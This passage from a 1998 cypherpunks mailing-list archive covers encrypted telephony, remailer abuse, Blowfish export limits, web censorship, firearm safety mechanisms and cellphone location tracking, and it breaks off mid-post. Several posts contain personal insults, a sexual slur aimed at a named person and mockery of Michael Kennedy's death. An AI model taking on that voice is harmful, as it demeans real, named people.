>    information on customers' names, telephone numbers, addresses and even
>    birthdays, the bank said Monday.
>    [INLINE] Sakura Bank Ltd. said data on up to 20,000 of its 15 million
>    individual customers could have been stolen and that it had confirmed
>    that files on at least 37 then were leaked to a mailing-list vendor in
>    Tokyo.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jrbl Pookah <lists@castle5.castlec.com>
Date: Tue, 6 Jan 1998 00:05:09 +0800
To: cypherpunks@toad.com
Subject: Encrypted Telephony Products
Message-ID: <Pine.LNX.3.95.980105105418.13020A-100000@castle5.castlec.com>
MIME-Version: 1.0
Content-Type: text/plain





	I've recently begun looking for internet telephony products that
employ reasonably secure encryption on-the-fly.  Now, I've found Nautilus,
and PGPFone, but neither product appears to have been updated for quite a
while now.  I was just wondering if anybody could give me recommendations
for more up-to-date products, and perhaps comparisons between those
available.

	Thank you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jim.burnes@ssds.com>
Date: Tue, 6 Jan 1998 01:11:41 +0800
To: Jrbl Pookah <lists@castle5.castlec.com>
Subject: Re: Encrypted Telephony Products
In-Reply-To: <Pine.LNX.3.95.980105105418.13020A-100000@castle5.castlec.com>
Message-ID: <Pine.LNX.3.95.980105110838.4557A-100000@westsec.denver.ssds.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 5 Jan 1998, Jrbl Pookah wrote:

> 
> 
> 	I've recently begun looking for internet telephony products that
> employ reasonably secure encryption on-the-fly.  Now, I've found Nautilus,
> and PGPFone, but neither product appears to have been updated for quite a
> while now.  I was just wondering if anybody could give me recommendations
> for more up-to-date products, and perhaps comparisons between those
> available.
> 
> 	Thank you.
> 

Try Speak Freely.

Sincercely,

J. Burnes






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Dustman <andy@neptune.chem.uga.edu>
Date: Tue, 6 Jan 1998 00:15:12 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: PGP-out-only vs. hashcash aware remailers?
In-Reply-To: <3.0.3.32.19980104120940.00722cdc@popd.ix.netcom.com>
Message-ID: <Pine.LNX.3.94.980105104829.6085O-100000@neptune.chem.uga.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 4 Jan 1998, Bill Stewart wrote:

> If you modify your remailer to only _output_ PGP-encrypted messages,
> you get hashcash-equivalence, and cut abuse substantially.
> The cost is limiting recipients to pgp users (plus known exceptions),
> but it's tough to spam people when you need to look up their PGP key
> and encrypt to it (at least you'll only get spams for high-tech stuff),
> and it's tougher for random abusers to abuse people since most targets
> don't have PGP keys, and a mailbox full of PGP junk is less annoying
> to most people than a mailbox full of human-readable hate mail.
> In particular, it's harder to send death threats to politicians
> if they don't have published PGP keys.
> 
> Is this a feature that makes sense?

It makes some sense. It's similar to what I proposed a few weeks ago with
"casual" remailers. The smart middleman portion of coerce does something
similar: If it looks like a PGP message (has the "BEGIN PGP MESSAGE" 
line), it doesn't chain through a random remailer but delivers directly.
I'm not sure if anyone is actually using this, though (perhaps
tea/mccain). What you seem to be proposing is sending non-encrypted
messages to /dev/null. That may yet be an option if things get bad, but I
don't think they are that bad yet. It does seem to achieve, in part, the
goals of hashcash (although it generally takes longer to generate
hashcash, depending on the collision length required). 

> How would you implement it?

You are correct that there are easy ways to spoof PGP messages well enough
to fool a simple parser. One way around this would be to pipe any apparent
PGP messages (start and end easily detected) through PGP to de-armor only. 
A couple problems: PGP (2.6.x) doesn't seem to have an option to only
de-armor; a sophisticated spoofer could make the armor verify correctly
anyway by generating the correct CRC (trivial if you know what you're
doing). So it seems sensible to only consider some simple safeguards and
not worry about actually decoding the armor. 

Andy Dustman / Computational Center for Molecular Structure and Design
For a great anti-spam procmail recipe, send me mail with subject "spam".
Append "+spamsucks" to my username to ensure delivery.  KeyID=0xC72F3F1D
Encryption is too important to leave to the government. -- Bruce Schneier
http://www.athens.net/~dustman mailto:andy@neptune.chem.uga.edu   <}+++<





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Tue, 6 Jan 1998 03:39:22 +0800
To: ichudov@Algebra.COM
Subject: Re: Lock and Load (fwd)
In-Reply-To: <199712230422.WAA22160@einstein.ssz.com>
Message-ID: <3.0.3.32.19980105111943.006ce590@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 10:37 PM 12/22/97 -0600, Igor Chudov @ home wrote:

>You can't lock and load an AK. I remember that very well even though it
>has been a while. The bolt just would not go far enough back to pick up
>the cartridge. The bolt carrier's charging handle would only go as far
>as to allow for the weapon inspection.

I own a Norinco MAK-90 (a semi-auto only AK variant) and it is designed so
that a round cannot be chambered with the safety on.  If the weapon is not
cocked, the hammer hits the top of the sear (which is locked by the safety)
and prevents the bolt from traveling more than 1 inch to the rear.  If the
weapon is cocked, the charging handle on the side of the bolt hits the
front of the safety lever, which stops the rearward travel of the bolt at
about 2.5 inches, which is not sufficient to chamber a round.  The magazine
can be inserted or removed regardless of the position of the safety or the
bolt.

On my Winchester 1300 Defender 12-gauge, (a pump gun with a 7-round
magazine) the safety cannot be engaged until the weapon has been cocked,
which requires the action to be cycled.  This will chamber a round unless
the magazine is empty.

On my Norinco Model 320 carbine (a semi-auto only Uzi lookalike) if the
weapon is not cocked, and the grip safety is not depressed, the bolt is
locked in the forward position, which makes it rather difficult to chamber
a round.  However, the safe/fire selector (the sliding button on the left
side of the grip) has no effect on the bolt.  Neither safety has any effect
on inserting or removing a magazine.

ObOddGunTrivia:
One of the oddities of the SKS is that a magazine cannot be inserted or
removed unless the bolt is locked in the rearmost position.  The sides of
the bolt have grooves machined in them that the lips of the magazine occupy
when the bolt is forward.  This can make changing a half-full magazine kind
of annoying.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNLEyTMJF0kXqpw3MEQIp+QCg1btR4CI1QthIVV2AYTTi7ztS6r0AoNlB
LkkRQf7554PRxVe/Q+IsPqLs
=SAYC
-----END PGP SIGNATURE-----


Jonathan Wienke

PGP Key Fingerprints:
7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC

"If ye love wealth greater than liberty, the tranquility of servitude
greater than the animating contest for freedom, go home from us in peace.
We seek not your counsel, nor your arms. Crouch down and lick the hand that
feeds you. May your chains set lightly upon you; and may posterity forget
that ye were our countrymen."
-- Samuel Adams

"Stupidity is the one arena of of human achievement where most people
fulfill their potential."
-- Jonathan Wienke

Never sign a contract that contains the phrase "first-born child."

When the government fears the people there is liberty.
When the people fear the government there is tyranny.

RSA export-o-matic:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Tue, 6 Jan 1998 00:42:51 +0800
To: "'cypherpunks@toad.com>
Subject: RE: best body armor for cypherpunks [serious]
Message-ID: <6B5344C210C7D011835C0000F80127668B15C9@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain





> ----------
> From: 	Mix[SMTP:mixmaster@remail.obscura.com]
> Reply To: 	Mix
> Sent: 	Sunday, January 04, 1998 10:44 PM
> To: 	cypherpunks@toad.com
> Subject: 	best body armor for cypherpunks [serious]
> 
> What is, in your opinion, the best (price and performance-wise)
> body armor for cypherpunks?
> 
After a few years on this list, one develops such a thick skin that
extra protection is superfluos

Peter Trei
ptrei@securitydynamics.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 6 Jan 1998 00:53:42 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Watch Foundation reports child nudity as illegal!!
Message-ID: <199801051639.LAA26491@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From jrg@blodwen.demon.co.uk Mon Jan  5 05:57:11 1998
   >   
   >   Information Security <The@NSA.sucks> writes:
   >   > Can anyone not biased like Paul "British Twit of the Month" Allen
   >   > confirm the two jpg's now visible at <http://www.panix.com/~guy>
   >   > are in Demon's alt.binaries.pictures.nudism Usenet group?
   >   
   >   too late to check/ a right pain to check anyway bearing in mind how
   >   much is probably available in that group.
   >   
   >   Give some message-ids and it's very easy to check if they are and grab
   >   the headers of the messages from them (if you're really interested in
   >   how they got here, etc.)

My interest has blown over.

PICSRules is a political response to government pressure.

IWF immediately began watching for KiddiePorn and notifying
IWF member organizations (and police) about such posts.

Members are given the MD5 of the post to automatically
delete it when next seen, in addition to the first deletion.

The only thing "watch" organizations are good for is
spotting "controversial" material.

Demon/IWF's Clive Feather:
 
:     Some subscribers to IWF have asked to be notified of certain other
:     classes of material, since they *do* choose to censor and not carry
:     more than just material that is illegal to possess. Demon is not one
:     of these ISPs.

So, IWF supports labeling/spotting of controversial material
for the purposes of censorship, beyond what is illegal.

Thus, the IWF is not going to get anywhere with PICSRules.

No way in hell can they label all of the Net.

Usenet content is produced at a furious rate: it cannot be rated
until it has already expired off of most servers.

Rate WWW? Most are business: who cares about advertising/support?

Any page with a counter on it won't verify the MD5 taken when
it was "rated"...

PICSRules is a political prank on the politicians.

Kind of like The Jetsons was an educational show about the future.

What *is* happening are groups forming to censor material;
funded by governments...

#   http://192.215.107.71/wire/news/june/0630ratings.html
#
#   The Internet Watch Foundation, has already submitted a funding
#   request to the European Commission.
#
#   "Whatever happens, we will carry on trying to get the funding
#   we need," Kerr said. "These things cost money, and we have not
#   got all the money we need", said David Kerr, chief executive
#   of the British-based Internet Watch Foundation

This will probably keep expanding; Germany IWF to zap Nazi logos,
Israel IWF to zap revisionist history, Muslim IWF to zap heresy, etc.

---guy

   The never-ending joke: Dimitry "I suck my male students" Vulis





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 6 Jan 1998 06:19:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Anonymous Remailers
Message-ID: <v0400390bb0d6d383f9b3@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Sun, 4 Jan 1998 23:14:19 -0800
From: Chuq Von Rospach <chuqui@plaidworks.com>
Subject: Re: Anonymous Remailers
To: "ListMom-Talk Discussion List" <ListMom-Talk@SkyList.Net>
Mime-Version: 1.0
Precedence: Bulk
Reply-To: "ListMom-Talk Discussion List" <ListMom-Talk@SkyList.Net>
Sender: "ListMom-Talk Discussion List" <ListMom-Talk@SkyList.Net>
X-URL: <http://www.SkyList.Net/ListMom-Talk.Home>

At 8:10 PM -0800 1/4/98, Eric Mings wrote:
> I noticed on Apple's info about acceptable behavior on their lists, that
> they ban postings which originate from anonymous remailers (of which they
> include juno). I was wondering what experience people have had regarding
> abusive posts from such systems, and how one easily identifies them if
> you choose to ban postings originating from such systems. Thanks.

That's me.

I decided to stop accepting posts from anonymous remailers way back,
when anon.penet.fi was still alive. Some of that is philosophy, some of
that was problems.

As far as problems, it's the normal stuff -- personal attacks,
mailbombing through anonymous remailers, copyright/slander/libel
issues, all the normal fun and games. Since you can't track users back,
you have real problems policing them. And since anonymous remailers
tend to allow multiple (heading towards infinite) remailing addresses,
the practical issue of how to lock out an abusive user becomes severe.
That's why Juno is bounced -- you can create accounts and then use them
instantly, with no policing and no tracking. I had a problem a while
back with an idiot who did, abusively. After about four rounds of
trying to get him to go away, I did it the hard way, with a virtual
neutron bomb.

Juno's no help. In THAT case, I got email from them six weeks later
apologizing for being so delayed in responding to my requests for help.
they didn't offer to help, they just apologized for not telling me they
wouldn't for so long. And that's been typical of my dealing with them.
They don't police. They don't care. Their systems are set up so that
basically, they *can't* police things.

So I just don't even get into it. Since I can't police their users, I
police their site. Effectively, they are an anonymous remailer. God
knows enough folks use them as one.


--
         Chuq Von Rospach (chuq@apple.com) Apple IS&T Mail List Gnome
                 <http://www.solutions.apple.com/ListAdmin/>

 Plaidworks Consulting (chuqui@plaidworks.com) <http://www.plaidworks.com/>
   (<http://www.plaidworks.com/hockey/> +-+ The home for Hockey on the net)

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 6 Jan 1998 03:15:07 +0800
To: Tim May <tcmay@got.net>
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <199801030048.SAA02365@wire.insync.net>
Message-ID: <v03007800b0d6d4af2e4b@[204.254.22.20]>
MIME-Version: 1.0
Content-Type: text/plain



At 17:17 -0800 1/2/98, Tim May wrote:
>Wanna bet that if I was on the hill in Aspen horsing around playing ski
>football and behaving like a drunken lout with a bunch of other people the
>ski patrol would whistle us down and tell us to knock it off?

We have a good story in this week's Time that talks about how the ski
resort had repeatedly asked the Kennedys to knock it off. Including the
night before the accident. Even on the "fateful" afternoon, the ski patrol
had told the Kennedys -- the last on the slopes -- it was time to quit.
"Nevertheless, 36 members of the Kennedy party prepared to play."

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 6 Jan 1998 05:55:52 +0800
To: "Alan Olsen" <ichudov@Algebra.COM>
Subject: Netiquette: (was) Re: .50 ammo
Message-ID: <199801052140.QAA24055@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On 1/5/98 1:29 AM, Alan Olsen (alan@clueserver.org)  passed this
wisdom:

>At 09:24 PM 1/4/98 -0600, Igor Chudov @ home wrote:
>>Alan wrote:
>>> At 04:50 PM 1/3/98 -0500, Brian B. Riley wrote:
>>> The hardest part is getting the 50 cal ammo.  (He had his Federal
>>> firearms license and was in the National Guard, so it was not too
>>> difficult for him.) Getting AP and other special ammo would be
>>> doubly difficult. (Non-specialty ammo could be reloaded as long as
>>> you could get molds and primer caps.) 
>>> 
>>> I guess it depends on your military and/or black market
>>> connections.
>>
>>I have seen what appeared to be .50 ammo (probably not AP) in gun
>> stores.
>
>I am surprised, but I am sure you are correct. It has been quite a 
>whilesince I have spent time in gun shops. (My expenditures on ammo 
>is limited to smaller calibers. I tend not to look at other things 
>because I cannot afford what I 
>want.)

 small point here of netiquette. one should be careful when trimming
down quotes out of context ... I did not make the above statement.
This time it is of little matter as the statement wasn't very
inflammatory nor was it very controversial (not that CP is *ever*
inflammatory or controversial), but it may well have been.


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNLFTOz7r4fUXwraZAQHDDQf/XBk9i+6+GA7UcZD/a1CY3F/102Kh5u/L
Y0KfqoMGCqv23oeJbayxjbWtXKSDd5+wX8Owrmr0i4arsD7vsunECkiQeUf0oQ83
Nid/tffRD5smu6P7mrf4yRVWOKKMmY8/VLOpFi9mRrOGVAWpGildXDikIhDuFylW
RHjRnSugM88RUqz1Z7rLuIirMpYm//UVT0YRM9EXUyH/ejmOgH5YB8vP5isPBa4T
L2TjPKbirQU1BX5HdgrVB+WkOpHdfSvA6sFlMPdAG4VvRltXA1IXZv1ce1AlKgtW
OTnzvFoVrnMieJ0cKxe/dXSbFpedb9BBmCcCo+GWuf/Z2M/NWMwSnA==
=SO5L
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  "There's so much comedy on television. Does that cause comedy in
    the streets?"  Dick Cavett






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 6 Jan 1998 07:20:04 +0800
To: cypherpunks@toad.com
Subject: Crypto-enemy senator gets cash from Johnny Chung
Message-ID: <v03007804b0d715aa753a@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



Sen. Kerry is not as extreme as Sen. Kerrey, but he still is an enemy of
strong encryption. I wrote last year:

>>>>
The committee also approved amendments proposed by
Kerry that would give jurisdiction over crypto exports
to a nine-member "Encryption Export Advisory Board."
The panel would "evaluate whether [a] market exists
abroad" and make non-binding recommendations to the
president.
<<<<

Here's what he's been up to recently...

-Declan

        KERRY: DAMAGE CONTROL
	Boston Globe's Black reports, Boston atty Robert Crowe on
12/29 resigned as chair of Sen. John Kerry's (D) camp. finance
cmte "in response to negative publicity that featured his ties"
to Kerry.  Crowe, "a longtime close personal friend and financial
supporter" of Kerry's, "reportedly decided that he had had enough
of critical newspaper stories, sources close to Kerry said."
Kerry, responding to the resignation which he termed
"understandable": "Bob Crowe has done an outstanding job for me,
often at the expense of his own personal life."  Crowe had "made
headlines" recently in regard to his role as a lobbyist for
Boston's Big Dig and his work for a firm hired by the Swiss
Bankers Assn. Kerry's finance cmte will be "'streamlined'" and
headed by Peter Maroney who was hired by the campaign last fall
(12/30).
	CHUNG CONNECTION?
	A Los Angeles Times article by Rempel & Miller reported that
Kerry received $10K in '97 from Dem contributor Johnny Chung
following Chung's "high-level meeting" with SEC officials,
arranged for him by Kerry's office soon after he paid a visit
there. A Kerry spokesperson "confirmed that Kerry's office
contacted the SEC" on Chung's behalf, "but she said it involved
no more than helping arrange "'a tour.'"  The DoJ is
investigating the contribution which Chung is said to have made
through several employees and others whom he reimbursed. Kerry
spokesperson Tovah Ravitz "acknowledged" that Chung was
approached for a donation "'numerous times because they were
nearing the end of a tough campaign.'" Although Ravitz said
Kerry's office arranged a tour for Chung, SEC officials "said the
request on behalf of Chung involved a briefing session" (12/24).
Boston Globe's Zitner follows up on the Times story, reporting
that Chung's visit to the SEC "was something more than a casual
tour but something less than special access to high government
official, the SEC said." Kerry's Ravitz said Chung made the
request for a stop at the SEC during an 8/96 visit, accompanied
by other Asian businessmen, to Kerry's office. Chung and the
others visited the SEC later the same day (12/25). On 12/26, USA
Today reported that Ravitz said the Times was incorrect in its
initial report (12/26).
	01/05 12:35






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Tue, 6 Jan 1998 08:47:41 +0800
To: JonWienk@ix.netcom.com (Jonathan Wienke)
Subject: Re: Lock and Load (fwd)
In-Reply-To: <3.0.3.32.19980105111943.006ce590@popd.netcruiser>
Message-ID: <199801060038.SAA30088@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jonathan Wienke wrote:
> At 10:37 PM 12/22/97 -0600, Igor Chudov @ home wrote:
> >You can't lock and load an AK. I remember that very well even though it
> >has been a while. The bolt just would not go far enough back to pick up
> >the cartridge. The bolt carrier's charging handle would only go as far
> >as to allow for the weapon inspection.
> 
> I own a Norinco MAK-90 (a semi-auto only AK variant) and it is designed so
> that a round cannot be chambered with the safety on.  If the weapon is not
> cocked, the hammer hits the top of the sear (which is locked by the safety)
> and prevents the bolt from traveling more than 1 inch to the rear.  If the
> weapon is cocked, the charging handle on the side of the bolt hits the
> front of the safety lever, which stops the rearward travel of the bolt at
> about 2.5 inches, which is not sufficient to chamber a round.  The magazine
> can be inserted or removed regardless of the position of the safety or the
> bolt.

All AKs are like that. And I maintain that it is the right design, from the
safety standpoint.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 6 Jan 1998 08:42:54 +0800
To: cypherpunks@toad.com
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <v03007800b0d6d4af2e4b@[204.254.22.20]>
Message-ID: <53Zuie3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Declan McCullagh <declan@well.com> writes:

> We have a good story in this week's Time that talks about how the ski
> resort had repeatedly asked the Kennedys to knock it off. Including the
> night before the accident. Even on the "fateful" afternoon, the ski patrol
> had told the Kennedys -- the last on the slopes -- it was time to quit.
> "Nevertheless, 36 members of the Kennedy party prepared to play."

"Evolution in action."

Thank you, Michael Kennedy, for improving humanity's gene pool.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 6 Jan 1998 10:53:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Comparing PGP to Symantec's Secret Stuff
In-Reply-To: <v03007800b0bc0c9a7689@[198.115.179.81]>
Message-ID: <199801060247.UAA24711@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



>	Having worked for those multinationals and defense
>contractors, I've seen them buy new products with serious weaknesses
>in key generation, with year 2000 problems, with stream ciphers used
>to protect stored data--keyed the same way each time.  I've seen them
>use code that sent cleartext where it should have been encrypting on
>the wire.

I second this.  The pitiful state of "secure code" is shocking.  (Actually,
I just wrote an essay on the topic.  Get a copy for yourself at:
http://www.counterpane.com/pitfalls.html.)

Bruce
**************************************************************************
* Bruce Schneier                 For information on APPLIED CRYPTOGRAPHY
* Counterpane Systems            2nd EDITION (15% discount and errata), 
* schneier@counterpane.com       Counterpane Systems's consulting services, 
* http://www.counterpane.com/    or the Blowfish algorithm, see my website.
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 6 Jan 1998 09:58:49 +0800
To: cypherpunks@toad.com
Subject: Re: [Humor] Kennedy's New Legislation
Message-ID: <199801060150.UAA21492@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>  "Evolution in action."

>  Thank you, Michael Kennedy, for improving humanity's gene pool.

Too bad _you_ reproduced.
---guy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 6 Jan 1998 11:04:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Comparing PGP to Symantec's Secret Stuff
In-Reply-To: <v03007800b0bc0c9a7689@[198.115.179.81]>
Message-ID: <199801060259.UAA26681@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:56 PM 12/16/97 -0800, Bill Frantz wrote:
>At 3:01 AM -0800 12/16/97, Vin McLellan wrote:
>>   Norton Secret Stuff secures the data using the 32-bit Blowfish
>>encryption algorithm -- which is why it's approved for unrestricted export
>>outside the US by the U.S. government.
>
>This is the first I've heard of a Blowfish based produce being approved for
>export.  Since Blowfish has about 9 bits worth of protection against brute
>force searches in its key schedule, this is about a 41 bit approval.  Does
>anyone know of an export permit for a version of Blowfish with a key longer
>than 32 bits?

Blowfish with a 32-bit key has been approved for export before.  The 
argument is that the long key setup time makes 32-bit Blowfish as weak
as 40-bit anything else.  I don't particularly agree, but there you have it.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis,MN  55419       Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 6 Jan 1998 17:05:50 +0800
To: cypherpunks@toad.com
Subject: cypherpunks and guns
Message-ID: <19980106005136.23824@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't understand why there is so much talk about guns here lately.
Unless someone comes up with a weapon that has some very unusual economic
properties, individuals cannot hope to compete with governments in the
domain of deadly force. If we have to resort to physical violence, we've
already lost!

Think about it: if we can defend ourselves with guns, why would we need
crypto?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 6 Jan 1998 18:12:19 +0800
To: Wei Dai <cypherpunks@toad.com
Subject: Re: cypherpunks and guns
In-Reply-To: <19980106005136.23824@eskimo.com>
Message-ID: <v03102801b0d7ab10ffdb@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:51 AM -0800 1/6/98, Wei Dai wrote:
>I don't understand why there is so much talk about guns here lately.
>Unless someone comes up with a weapon that has some very unusual economic
>properties, individuals cannot hope to compete with governments in the
>domain of deadly force. If we have to resort to physical violence, we've
>already lost!

People on almost any unmoderated mailing list will talk about what
interests them. Those who mainly want to talk about crypto are of course
free to do so.

(You have, Wei, done important work in this area. But you very, very seldom
write articles on this list, at least not for the last couple of years--I
count less than one article per month from you over the past half year. I
urge you to write such articles if you dislike reading what others are
writing.)

I agree that two or three or four or five years ago I was much more likely
to write about something more crypto-related. Well, much time has passed.
Most things worth saying have been said, at least for me. I can't work up
the energy to discuss "data havens" a fourth or fifth time.

(And an article from me on data havens, or information markets, or crypto
anarchy, will usually produce complaints from people who don't see what it
has to do with getting the latest version of PGP! That's only a slight
exaggeration.)

There have also been very few major new participants. A few years ago we
could count on one or two major new "talents" joining the list each year,
generating articles and new ideas. For whatever reasons, this has nearly
stopped.

I would guess the reasons are related to a) no major publicity stories as
in past years, b) the disintegration of the list a year ago in the wake of
the "moderation" fiasco (which cut subscriptions by 3-5x), c) competition
from several other crypto lists, "moderated" by their owners, d) exhaustion
of the older participants in the battles, and e) those who are interested
in our topics have mostly already found us (meaning, the rich hunting
period is over). ;


>Think about it: if we can defend ourselves with guns, why would we need
>crypto?

This has an obvious answer. Guns are a last resort. Crypto makes it less
likely that Big Brother will know what the proles are talking about, less
likely that participants in a plan will be targetted for investigation and
raids.

Wei, your question could be paraphrased this way:

"If Pablo Escobar could defend himself with guns, why did he need crypto in
his cellphone?"

(The answer being that P. Escobar was detected by using a cellphone without
security. The NSA then told the DEA and its allies where he was and they
took him out on a rooftop.)

Final comment: If I find the motivation, I may finish an essay I've been
working on about how we, the Cypherpunks and the World, are *retrogressing*
in crypto areas. Most of the exotic applications are no longer being
discussed, and various mundane commercial products are the main focus. Yawn.

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Loren J. Rittle" <rittle@supra.rsch.comm.mot.com>
Date: Tue, 6 Jan 1998 18:14:10 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Mobile phones used as trackers
In-Reply-To: <199801012054.PAA25297@users.invweb.net>
Message-ID: <199801061007.EAA28104@supra.rsch.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <199801012054.PAA25297@users.invweb.net>,
"William H. Geiger III" <whgiii@invweb.net> writes:

> It is my understanding that they can still track you with the cell phone
> turned off so long as there is power going to the box (most auto cell
> phones are hardwired into the cars electrical system).

This is the funniest thing I have read in some time.  Assuming you
watch the show, I think you may have watched too many episodes of the
X-Files (TM).

When the subscriber unit (SU a.k.a. the cellular phone) is turned off,
"they" can't track you.  Now, it is possible that some cars have
built-in SUs that automatically power-on whenever the car is started.
In this case, the SU is clearly turned on and the user knows it.

Analog cellular phone systems in the U.S. only force the SU to
transmit when they need too.  As someone else already mentioned, from
the perspective of cellular system operators, bandwidth is in short
supply.  The cellular system operators wouldn't stand for a bunch of
unneeded transmissions "just to track location".

Based upon my own personal informal study [1] and some past knowledge
of cellular-type systems [2], in general, I believe the following
about analog cellular systems fielded in the U.S.:

1) "They" might be able to get a location reading at power-on time.
   The SU will check to see if it is being powered on within a
   different cell than it was last registered.  If the cell is
   different, then the SU transmits a message on the cell's control
   channel to reregister.  If the SU believes it is in the same cell,
   then it doesn't transmit anything at power-on time.  If the SU
   transmits, it will be a very short burst.  This would allow an
   attacker to see your location at power-on time.

2) When your SU is on, "they" can track your cell-to-cell movements.
   Cells are on the order of 1-10 miles in diameter.  The more
   populated the area (actually, the more likely the system is to be
   used in an area), the smaller the cell size.  "They" will only get
   a reading when you move between cells.  The system uses a form of
   hysteresis so your SU doesn't flip back and forth between two cells
   while you are on the "edge" between cell.  Actually, there are no
   real edges to the cells in an RF cellular system.  There is a bit
   of overlap between cells and the cell boundaries actually move over
   time due to environmental factors.  I.e. your SU might be
   stationary and yet decide to move to a different cell due to a
   stronger signal being seen from a different cell at a particular
   point in time.

3) "They" can track your fine-grain movement while you are engaged in
    a call or call setup.  This is because an SU transmits the entire
    time these activities take place.  Note that call setup can be for
    either incoming or outgoing calls.

The above appear to be the only times an SU will transmit in a
properly functioning analog cellular system.

Now, if we change the rules to allow an active "spoof" attack or
participation by the service provider, I speculate that specific
